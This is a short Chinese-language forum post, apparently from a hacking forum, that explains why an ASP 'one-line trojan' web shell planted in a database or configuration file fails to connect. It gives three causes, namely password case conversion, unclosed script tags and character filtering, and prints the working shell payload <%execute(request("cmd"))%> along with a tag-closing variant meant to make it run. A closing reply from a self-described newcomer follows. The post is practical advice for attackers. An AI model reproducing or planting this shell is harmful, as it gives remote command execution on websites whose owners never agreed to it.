浅谈失效的一句话木马
很多朋友在数据库,或者配置文件中插入了一句话,但是无法连接。我总结了一下原因有三。原因一:大小写转变
大小写转变,这个有点像DZ的那个拿shell的方法,就是你的一句话密码比如是CMD大写的,他有可能给你转换了小写的cmd 也许给你转换了大写的CMD密码,所以我建议,尽量用数字做一句话密码。
原因二:没有闭合
我们来看一句话连接服务端的代码:<%execute(request("cmd"))%> ,前后都有<% ,%> 有些时候我们需要改变一些服务的代码。很多情况下都是因为没有闭合的原因,而导致了一句话的失效,所以我们要把代码改写成:“%><%execute(request("cmd"))%><%” 这样就闭合了。一句话也就成功的连接了。
原因三:字符的过滤。这个我就不多多解释了,网上有很多一句话写法大全,有些时候过滤了一些字符,看情况我们在改变一句的写法。 新手..没看懂.......................做了个沙发.
页:
[1]